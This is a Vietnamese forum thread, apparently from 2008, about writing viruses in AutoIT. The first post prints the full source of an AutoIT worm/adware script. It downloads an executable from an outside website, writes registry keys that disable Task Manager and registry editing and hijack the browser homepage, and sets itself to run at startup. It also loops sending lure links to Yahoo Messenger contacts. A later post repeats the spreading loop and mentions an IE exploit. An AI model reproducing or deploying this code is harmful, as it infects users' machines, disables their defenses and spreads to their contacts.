Công cụ bảo vệ mã nguồn .NET mạnh nhất, không thể unpack, miễn phí cho các khách hàng đầu tiên đăng ký.
Từ 1 tới 6 trên tổng số 6 kết quả

Đề tài: lập trình Virus bằng AutoIT. Ai biết không

  1. #1
    Ngày gia nhập
    02 2008
    Bài viết
    1,009

    Mặc định lập trình Virus bằng AutoIT. Ai biết không

    mình thấy có nhiều thể loại code được biên dịch bằng trình biên dịch này trên web nhưng không biết nó là ngôn ngữ gì nữa,ai biết có thể chỉ giáo không
    VD code này
    AutoIT Code:
    1.                                 ; <AUT2EXE VERSION: 3.2.0.1>
    2.  
    3. ; ----------------------------------------------------------------------------
    4. ; <AUT2EXE INCLUDE-START: D:\AutoIT\Projects\Adware\DKC.au3>
    5. ; ----------------------------------------------------------------------------
    6.  
    7. ;--------------------------------------------
    8. ; Tac Gia: KVD
    9. ; Phan Mem: DKC Bot
    10. ; Phien Ban: 1.1
    11. ; Cong Dung: Quang cao Website thong qua Y!M
    12. ; Phat Hanh: 1-9-2006
    13. ;--------------------------------------------
    14.  
    15. ; Thiet Lap
    16. #NoTrayIcon
    17. $website = "http://playboy.com"
    18.  
    19. ; Lay Nhiem Vao He Thong
    20. If Not FileExists(@WindowsDir & "\taskmng.exe") Then
    21. InetGet ($website & "/dkc.exe", @WindowsDir & "\taskmng.exe", 0, 1)
    22. Sleep(5000)
    23.  
    24. ; Ghi Khoa Registry
    25. RegWrite("HKEY_CURRENT_USER\Software\Policies\Micr   osoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "1")
    26. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win   dows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
    27. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1")
    28. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Int   ernet Explorer\Main", "Start Page", "REG_SZ", $website)
    29. RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V   iew\YMSGR_buzz", "content url", "REG_SZ", $website)
    30. RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V   iew\YMSGR_Launchcast", "content url", "REG_SZ", $website)
    31. RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\taskmng.exe")
    32. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Int   ernet Explorer\Main", "Window Title", "REG_SZ", "zzzKITClubzzz")
    33.  
    34. ; Danh Sach Tin Nhan Ngau Nhien
    35. Dim $tin[10]
    36. $tin[0] = "Nguoi ra di vi anh da mang lam lo hay tai vi anh day qua ngheo? Chang the trao ve em duoc nhu long em luon uoc mo, giac mo giau sang... " & $website & " "
    37. $tin[1] = "Ngay khong em anh day lam sao cho het ngay? Sang dem duong nhu chi co anh voi anh quay quang... " & $website & " "
    38. $tin[2] = "Om bau dau thuong, minh anh co don chon day. Ngay mai em ra di, chon giau bao ky niem... " & $website & " "
    39. $tin[3] = "Dem nay mua ngoai hien, mua oi dung roi them cho xot xa. Anh khong quay ve day, loi nao anh noi da quen... " & $website & " "
    40. $tin[4] = "Ngay mai thoi doi ta lia xa em con nho? That long anh muon ta nhin thay nhau, cho quen mau cau yeu thuong em voi anh hom nao... " & $website & " "
    41. $tin[5] = "Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang nam qua ta dap xay. Gio day chi la nhung ky niem buon... " & $website & " "
    42. $tin[6] = "Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da den nhu la giac mo roi ra di cho anh bat ngo... " & $website & " "
    43. $tin[7] = "Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoi lac loi buoc chan ve noi xa xoi, cay dang chi rieng minh toi... " & $website & " "
    44. $tin[8] = "Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieu yeu thuong nhung ngay qua da tan theo khoi may bay that xa... " & $website & " "
    45. $tin[9] = "Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan... Ve dau toi biet di ve dau? " & $website & " "
    46.  
    47. ; Ham Thay Doi Status & Gui Tin Nhan
    48. While (1)
    49. sleep(60000)
    50. $tieude = WinGetTitle("Yahoo! Messenger", "")
    51. $kiemtra = WinExists ($tieude)
    52. If $kiemtra = 1 Then
    53. $ngaunhien = Random(0,9,1)
    54. ClipPut($tin[$ngaunhien])
    55. WinActivate($tieude)
    56. Send("!m")
    57. Send("un")
    58. Send("^v {ENTER}{ENTER}")
    59. Send("^m")
    60. Send("{DOWN}")
    61. Send("^{SHIFTDOWN}{END}{SHIFTUP}")
    62. Send("{ENTER}")
    63. Send("^v {ENTER}")
    64. Sleep(1800000)
    65.  
    66. ; ----------------------------------------------------------------------------
    67. ; <AUT2EXE INCLUDE-END: D:\AutoIT\Projects\Adware\DKC.au3>
    68. ; -----------------------

    được dịch bằng
    Ref Link Code:
    Công cụ bảo vệ mã nguồn .NET mạnh nhất hiện tại, miễn phí cho các khách hàng đầu tiên đăng ký.

  2. #2
    Ngày gia nhập
    09 2008
    Bài viết
    223

    nếu mình nhớ ko nhầm thì code này này được dump ra bởi thanhth (cuasotinhoc.vn)

    Code đc viết bằng AutoIT, một ngôn ngữ có khả năng can thiệp hệ thống mạnh. Chủ yếu là xài các script để thực hiện, dây là 1 lợi thế và ũng là yếu điểm của nó

  3. #3
    Ngày gia nhập
    02 2008
    Bài viết
    1,009

    uhm,sau 2 ngày tìm hiểu mình cũng hiểu nguyên tắc của nó rồi,đây chính là con virus gây điên đảo hồi đầu năm nay nếu ai nhớ thì chắc là biết cái tên gaixinh -> đây chính là 1 dạng của nó
    Đã được chỉnh sửa lần cuối bởi AlexF : 28-09-2008 lúc 03:59 PM.

  4. #4
    Ngày gia nhập
    09 2008
    Bài viết
    223

    Trích dẫn Nguyên bản được gửi bởi coder_gate Xem bài viết
    uhm,sau 2 ngày tìm hiểu mình cũng hiểu nguyên tắc của nó rồi,đây chính là con virus gây điên đảo hồi đầu năm nay nếu ai nhớ thì chắc là biết cái tên gaixinh -> đây chính là 1 dạng của nó
    Thực ra con girltinh.tk đó là 1 dạng phát triển tiếp của con này, bởi con đó có nhiều tính năng hơn, mình đã từng viết 1 script (MS-Batch script) để kill con này nên khá rõ về nó

    Hiện chạy chủ yếu các loại Worm lây nhiễm qua Y!M đều là AutoIt (1 số là VB6)

  5. #5
    Ngày gia nhập
    02 2008
    Bài viết
    1,009

    Thực ra con girltinh.tk đó là 1 dạng phát triển tiếp của con này, bởi con đó có nhiều tính năng hơn, mình đã từng viết 1 script (MS-Batch script) để kill con này nên khá rõ về nó

    Hiện chạy chủ yếu các loại Worm lây nhiễm qua Y!M đều là AutoIt (1 số là VB6)
    liệu có phải gaixinh sẽ cho phép khi người dùng kích vào trang web là tự động tải virus về không,mình vẫn chưa rõ là làm thế nào để người lập trình có thể tự động kích họat gaixinh ở victim nhỉ,hay là khi tải về nó lại ghi ở dạng autorun

  6. #6
    Ngày gia nhập
    03 2008
    Bài viết
    36

    Mặc định lập trình Virus bằng AutoIT. Ai biết không

    Trích dẫn Nguyên bản được gửi bởi coder_gate Xem bài viết
    liệu có phải gaixinh sẽ cho phép khi người dùng kích vào trang web là tự động tải virus về không,mình vẫn chưa rõ là làm thế nào để người lập trình có thể tự động kích họat gaixinh ở victim nhỉ,hay là khi tải về nó lại ghi ở dạng autorun
    Không phải vậy đâu thật ra tại thời điểm đó con virus gaixinh lợi dụng lỗ hỗng của IE (MS0614), nếu ai dùng trình duyệt IE để mở trang web có đoạn mã độc hại thì nó sẽ tự động download về máy con girlxinh và thực thi con girlxiinh mà không có cảnh báo hoặc nhắc nhở nên nhiều người bị dính mà vẫn không biết vì sao bị dính.
    Sau đó con girlxinh (được viết bằng AutoIT) lại lợi dụng Yahoo để gởi tin nhắn có chứa trang web có đoạn mã độc đó đến mọi người trong list yahoo dẫn đến người này truyền cho người kia
    Đây là đoạn mà con girlxinh dùng để gởi tin nhắn
    Visual C++ Code:
    1. ; Ham Thay Doi Status & Gui Tin Nhan
    2. While (1)
    3. sleep(60000)
    4. $tieude = WinGetTitle("Yahoo! Messenger", "")
    5. $kiemtra = WinExists ($tieude)
    6. If $kiemtra = 1 Then
    7. $ngaunhien = Random(0,9,1)
    8. ClipPut($tin[$ngaunhien])
    9. BlockInput (1)
    10. WinActivate($tieude)
    11. Send("!m")
    12. Send("un")
    13. Send("^v {ENTER}{ENTER}")
    14. Send("^m")
    15. Send("{DOWN}")
    16. Send("^{SHIFTDOWN}{END}{SHIFTUP}")
    17. Send("{ENTER}")
    18. Send("^v {ENTER}")
    19. BlockInput (0)
    20. EndIf
    21. Sleep(1800000)
    22. WEnd
    Hiện tai nếu ai xài bản WinXPSP3 thì không còn bị lỗ hỗng này nữa với lại lỗ hỗng này giờ nhạy cảm với mấy trình antivirus lắm mở lên là antivirus kêu í ới àh
    Công cụ bảo vệ mã nguồn .NET mạnh nhất hiện tại, miễn phí cho các khách hàng đầu tiên đăng ký.

Các đề tài tương tự

  1. Xin lệnh autoit
    Gửi bởi kyupro trong diễn đàn Thắc mắc chung
    Trả lời: 0
    Bài viết cuối: 30-11-2013, 11:37 AM
  2. Câu Lạc Bộ AutoIT Việt
    Gửi bởi ZenBi trong diễn đàn Giới thiệu website, sản phẩm của bạn
    Trả lời: 0
    Bài viết cuối: 01-12-2011, 09:12 PM
  3. Viết virus khóa chuột - Lập trình virus trên C
    Gửi bởi AlexF trong diễn đàn Lập trình Virus & Anti-Virus
    Trả lời: 21
    Bài viết cuối: 03-07-2010, 09:57 AM

Quyền hạn của bạn

  • Bạn không thể gửi đề tài mới
  • Bạn không thể gửi bài trả lời
  • Bạn không thể gửi các đính kèm
  • Bạn không thể chỉnh sửa bài viết của bạn